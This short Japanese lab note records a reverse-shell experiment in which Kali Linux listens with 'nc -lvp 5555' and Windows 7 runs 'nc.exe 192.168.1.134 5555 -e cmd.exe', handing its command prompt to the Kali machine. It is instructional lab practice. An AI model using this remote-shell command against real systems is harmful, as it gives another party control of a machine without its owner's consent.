Netcat 接続実験 その2
Wndows7 と KaliLinux でリバースシェルの実験
KaliLinux で
ctrl + Alt +t で端末を起動
nc -lvp 5555
で
Netcat を待受状態で起動
また、別の端末を起動し
ifconfig
でIPアドレスを調べておく
inet と書かれている部分がIPアドレス
次に Windows7 で Command Prompt を起動し
cd C:Work nc.exe 192.168.1.134 5555 -e cmd.exe
で nc で KaliLinux へ接続
すると KaliLinux 側の端末に Windows 7 のCommand Prompt が
表示される
これで
ipconfig
を実行すると Windows 7 のIPアドレスが表示される
なお、Windows7 側のCommand Prompt なので
他のコマンドなども使うことができる
接続終了するには
KaliLinux 側で exit を実行すればOK